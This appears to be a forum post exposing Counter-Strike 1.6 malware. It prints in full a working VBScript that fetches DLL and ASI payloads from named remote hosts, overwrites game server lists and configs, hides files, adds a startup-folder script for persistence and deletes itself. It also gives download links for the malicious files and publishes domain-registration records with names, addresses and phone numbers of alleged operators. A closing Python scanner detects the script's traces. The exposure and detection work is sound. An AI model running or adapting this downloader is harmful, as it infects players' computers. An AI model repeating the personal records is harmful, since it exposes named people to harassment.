A parasite that uses various methods: it infects clients through farm servers, which become a botnet, by sending files to the innocent client, using a VB script and a CS launcher as an injector for the downloaded DLLs, mangling the game files, and a lot more.
Attached is an offline copy of the malicious files, in case the parasite happens to "cover its tracks". It was downloaded with the httrack program for analysis and as evidence. The files were taken from:
http://www.upload.ee/files/5405822/web_ ... k.rar.html
ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs
One of the parasite's files:
Code:
Sub unProtectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")
    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 0 ' normal
    End If
End Sub

Sub protectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")
    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 7 ' hidden + system + readonly
    End If
End Sub

Sub DeleteAFile( filename )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")
    If filesys.FileExists( filename ) Then
        unProtectFile( filename )
        filesys.DeleteFile( filename ), True
    End If
End Sub

Sub RenameFile( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")
    If filesys.FileExists( oldName ) Then
        filesys.MoveFile oldName, newName
    End If
End Sub

Sub ClearCFG( path )
    DeleteAFile path
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(path, ForWriting)
    objFile.Write ""
    objFile.Close
    protectFile path
End Sub

Sub DeleteAFolder( foldername )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")
    If filesys.FolderExists( foldername ) Then
        ' unProtectFile( foldername )
        filesys.DeleteFolder( foldername ), True
    End If
End Sub

Sub RenameFolder( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")
    If filesys.FolderExists( oldName ) Then
        filesys.MoveFolder oldName, newName
    End If
End Sub

strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & Rnd
On Error Resume Next
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", strURL, False
xml.Send
If Err.Number <> 0 Then
    WScript.Quit ' if file download fails, quit script
Else
    set oStream = createobject("Adodb.Stream")
    oStream.type = 1 ' adTypeBinary
    oStream.open
    oStream.write xml.responseBody
    ' overwrite
    oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite
    oStream.close
    set oStream = nothing
    Set xml = Nothing
End If
Err.Clear
On Error Goto 0

strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & Rnd
On Error Resume Next
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", strURL, False
xml.Send
If Err.Number <> 0 Then
    WScript.Quit ' if file download fails, quit script
Else
    set oStream = createobject("Adodb.Stream")
    oStream.type = 1 ' adTypeBinary
    oStream.open
    oStream.write xml.responseBody
    ' overwrite
    oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite
    oStream.close
    set oStream = nothing
    Set xml = Nothing
End If
Err.Clear
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "GTProtector.ini.upk"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("GTProtector.ini.upk")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "config\MasterServers.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("config\MasterServers.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "config\rev_MasterServers.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("config\rev_MasterServers.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "platform\config\MasterServers.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("platform\config\MasterServers.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "platform\config\rev_MasterServers.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("platform\config\rev_MasterServers.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "config\ServerBrowser.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("config\ServerBrowser.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "platform\config\ServerBrowser.vdf"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("platform\config\ServerBrowser.vdf")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "cstrike\resource\GameMenu.res"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("cstrike\resource\GameMenu.res")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "cstrike\userconfig.cfg"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("cstrike\userconfig.cfg")
End If
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "cstrike\motd_temp.html.old"
    RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old"
    DeleteAFile "cstrike\motd_temp.html"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("cstrike\motd_temp.html")
End If
On Error Goto 0

On Error Resume Next
ClearCFG "cstrike\hw\geforce.cfg"
ClearCFG "cstrike\hw\opengl.cfg"
ClearCFG "cstrike\autoexec.cfg"
' ClearCFG "cstrike\userconfig.cfg"
ClearCFG "cstrike\valve.rc"
ClearCFG "valve\hw\geforce.cfg"
ClearCFG "valve\hw\opengl.cfg"
ClearCFG "valve\valve.rc"
On Error Goto 0

CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe")
WScript.Sleep(3000)

On Error Resume Next
DeleteAFolder "cstrike\bin_old"
DeleteAFile "cstrike\bin_old"
DeleteAFile "GTProtector.dll.old"
DeleteAFile "GTProtector.asi.old"
DeleteAFile "GTProtector.ini.old"
RenameFolder "cstrike\bin", "cstrike\bin_old"
RenameFile "cstrike\bin", "cstrike\bin_old"
RenameFile "GTProtector.dll", "GTProtector.dll.old"
RenameFile "GTProtector.asi", "GTProtector.asi.old"
RenameFile "GTProtector.ini", "GTProtector.ini.old"
RenameFile "GTProtector.dll.upk", "GTProtector.dll"
RenameFile "GTProtector.asi.upk", "GTProtector.asi"
RenameFile "GTProtector.ini.upk", "GTProtector.ini"
protectFile("GTProtector.dll")
protectFile("GTProtector.asi")
protectFile("GTProtector.ini")
protectFile("cstrike\liblist.gam")
DeleteAFile "cstrike\bin\TrackerUI.dll"
DeleteAFile "valve\bin\TrackerUI.dll"
DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"
DeleteAFile "NexonUp.asi"
DeleteAFile "CsShield.dll"
RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old"
RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old"
RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old"
RenameFile "NexonUp.asi", "NexonUp.asi.old"
RenameFile "CsShield.dll", "CsShield.dll.old"
DeleteAFile "cstrike\bin\TrackerUI.dll.old"
DeleteAFile "valve\bin\TrackerUI.dll.old"
DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"
DeleteAFile "NexonUp.asi.old"
DeleteAFile "CsShield.dll.old"
DeleteAFile "mssv55.asi.old"
RenameFile "mssv55.asi", "mssv55.asi.old"
DeleteAFile "msvv82.asi.old"
RenameFile "msvv82.asi", "msvv82.asi.old"
On Error Goto 0

On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
    DeleteAFile "cstrike\bin"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting)
    objFile.Write objHTTP.ResponseText
    objFile.Close
    protectFile("cstrike\bin")
End If
On Error Goto 0

CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel")

Sub Up()
    Set objShell = Wscript.CreateObject("Wscript.Shell")
    strPath = objShell.SpecialFolders("StartUp")
    strMyPath = strPath & "\"
    On Error Resume Next
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")
    filesys.DeleteFile( strMyPath & "*.vbs" ), True
    On Error Goto 0
    On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE)
    objHTTP.Send
    If Err.Number <> 0 Then
    Else
        DeleteAFile strMyPath & "NexonUp.vbs"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        ' protectFile(strMyPath & "NexonUp.vbs")
    End If
    On Error Goto 0
    CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34))
End Sub

Up()

On Error Resume Next
WScript.Sleep 1000
Set fileSystem = CreateObject("Scripting.FileSystemObject")
thisScript = Wscript.ScriptFullName
fileSystem.DeleteFile(thisScript)
On Error Goto 0
Main project - the parasite's head, to which the traffic flows: indungi.ro
Side projects:
bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu
Members:
anaconda, unpack according to http://www.extreamcs.com/
Members' domain registration info:
Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:
An interesting link:
stockdownload.eu/NexonPanel
This post is intended for educational purposes, to drag the parasites into the light of day; any use of the files to infect a client is punishable by law.
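A check for the traces the script quoted above leaves in a game folder, as an added example that is not part of the original post. The function names, finding labels and the constructed directory tree in `demo()` are assumptions made for illustration; the file names and the attribute value 7 come from the quoted script.

```python
import os
import tempfile

# File names and paths the quoted script writes, relative to the game folder.
DROPPED = ["GTProtector.dll", "GTProtector.asi", "GTProtector.ini"]
BLANKED = ["cstrike/hw/geforce.cfg", "cstrike/hw/opengl.cfg", "cstrike/autoexec.cfg",
           "cstrike/valve.rc", "valve/hw/geforce.cfg", "valve/hw/opengl.cfg",
           "valve/valve.rc"]
LOCKED_ATTRS = 7  # readonly + hidden + system, as set by protectFile()

def scan(game_dir, startup_dir=None):
    """Return (kind, relative_path) findings for traces the script leaves."""
    findings = []
    def full(rel):
        return os.path.join(game_dir, *rel.split("/"))
    for rel in DROPPED:
        if os.path.isfile(full(rel)):
            findings.append(("payload-name", rel))
    # The script renames cstrike\bin to bin_old and then writes a *file* named bin.
    if os.path.isfile(full("cstrike/bin")):
        findings.append(("bin-is-file", "cstrike/bin"))
    if os.path.isdir(full("cstrike/bin_old")):
        findings.append(("bin-renamed", "cstrike/bin_old"))
    for rel in BLANKED:  # ClearCFG() leaves these as zero-byte files
        if os.path.isfile(full(rel)) and os.path.getsize(full(rel)) == 0:
            findings.append(("blanked-config", rel))
    for rel in DROPPED + BLANKED + ["cstrike/bin"]:
        if os.path.isfile(full(rel)):
            # st_file_attributes exists only on Windows; treated as 0 elsewhere.
            attrs = getattr(os.stat(full(rel)), "st_file_attributes", 0)
            if attrs & LOCKED_ATTRS == LOCKED_ATTRS:
                findings.append(("locked-attributes", rel))
    if startup_dir and os.path.isfile(os.path.join(startup_dir, "NexonUp.vbs")):
        findings.append(("startup-persistence", "NexonUp.vbs"))
    return findings

def demo():
    """Build a constructed, harmless directory tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        game, startup = os.path.join(root, "game"), os.path.join(root, "startup")
        os.makedirs(os.path.join(game, "cstrike", "bin_old"))
        os.makedirs(startup)
        for rel, body in [("GTProtector.dll", b"placeholder"), ("cstrike/bin", b"x"),
                          ("cstrike/autoexec.cfg", b""), ("cstrike/valve.rc", b"exec x")]:
            with open(os.path.join(game, *rel.split("/")), "wb") as fh:
                fh.write(body)
        open(os.path.join(startup, "NexonUp.vbs"), "w").close()
        return scan(game, startup)
```

A `payload-name` finding on its own only shows that a file with that name exists; the script itself renames pre-existing `GTProtector.*` files, so weigh it together with the other findings.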